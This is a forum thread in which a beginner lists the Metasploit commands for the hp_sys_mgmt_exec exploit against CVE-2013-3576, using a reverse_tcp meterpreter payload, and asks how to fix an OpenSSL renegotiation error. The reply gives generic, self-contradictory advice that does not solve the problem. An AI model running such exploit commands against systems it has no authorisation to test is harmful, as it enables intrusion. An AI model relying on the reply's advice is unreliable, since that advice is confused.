Error : unsafe legacy renegotiation disabled

Hello. I am newbie in programming and in penetration testing. I am interested in testing HP System Management Homepage JustGetSNMPQueue Command Injection vulnerability ([CVE-2013-3576] in one windows 2008 server. I installed Kali Linux 2022.3 to Virtualbox .I configured vm to use bridged adapter. I have internet through router. I opened metasploit framework. Typed :
use multi/http/hp_sys_mgmt_exec
set rhosts ‘ip of server’
set srvhost ‘local ip of kali linux’
I configured linux/x86/meterpreter/reverse_tcp payload with following command:
set lhosts ‘local ip of kali linux’
When i run exploit command this error occured :
Exploit failed [unreachable]: OpenSSL::SSL::SSLError SSL_connect returned=1 errno=0 peeraddr=‘ip of server’:2381 state=error: unsafe legacy renegotiation disabled.
I searched on internet about this error and found that reason of this error is metasploit using new openssl to connect to old server. But i dont know how to fix this error. What i must write in ruby code of that exploit or what i must do in kali linux to fix this error ? Thanks.

The error message “unsafe legacy renegotiation disabled” is related to SSL/TLS protocol and indicates that the server is refusing to establish a connection due to security reasons. Here are some tips to fix this error:

Update your SSL/TLS library: Make sure that your SSL/TLS library is up to date. If you are using OpenSSL, update to the latest version of the library.

Check your SSL/TLS configuration: Make sure that your SSL/TLS configuration is correct. Check your configuration file and ensure that it is configured properly.

Disable legacy renegotiation: The error message suggests that legacy renegotiation is disabled. Ensure that it is disabled in your SSL/TLS configuration.

Enable secure renegotiation: Enable secure renegotiation in your SSL/TLS configuration. Secure renegotiation is a safer way to renegotiate an SSL/TLS connection.

Contact your server administrator: If the above steps don’t work, consider reaching out to your server administrator for further assistance. They may be able to provide additional guidance on how to fix the error.

Regards,
Rachel Gomez